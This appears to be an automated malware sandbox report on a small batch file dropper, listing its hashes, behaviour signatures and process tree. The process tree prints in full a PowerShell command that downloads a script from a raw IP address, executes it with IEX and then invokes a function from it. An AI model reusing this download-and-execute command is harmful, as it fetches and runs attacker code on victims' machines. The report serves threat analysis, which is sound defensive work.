Analysis
max time kernel: 111s
max time network: 102s
platform: windows7_x64
resource: win7v200213
submitted: 13-02-2020 23:10
Static task
static1

Behavioral task
behavioral1
Sample: dTSMxBv5.bat
Resource: win7v200213 (windows7_x64)
0 signatures
0 seconds

Behavioral task
behavioral2
Sample: dTSMxBv5.bat
Resource: win10v191014 (windows10_x64)
0 signatures
0 seconds
General
Target: dTSMxBv5.bat
Size: 190B
MD5: b43fc9677f0267630d7259cae180102b
SHA1: 47b41ad33d7109bec3a432b7dd105153f0ba610b
SHA256: 656e7d92a11142f16b80b527eee75b122b5c19143c2c21da4c37af0d5bf57d7a
SHA512: 88804f6050a25e4861b337a9f4db75d21706ab81f15cb1d77b6aa29349e6534af25025cd5ec800f36136124aa37a2f99f241108a7355fcf71bfa6aaac9ffd492
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/dTSMxBv5
Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes:
pid   process
1624  powershell.exe

Suspicious use of WriteProcessMemory (1 IoCs)
Processes:
description                       pid   process   target process
PID 1600 wrote to memory of 1624  1600  cmd.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
description              pid   process
Token: SeDebugPrivilege  1624  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
pid   process
1624  powershell.exe
1624  powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes:
flow  pid   process
1     1624  powershell.exe
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c "C:\Users\Admin\AppData\Local\Temp\dTSMxBv5.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/dTSMxBv5');Invoke-GUHPOFB;Start-Sleep -s 10000"
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request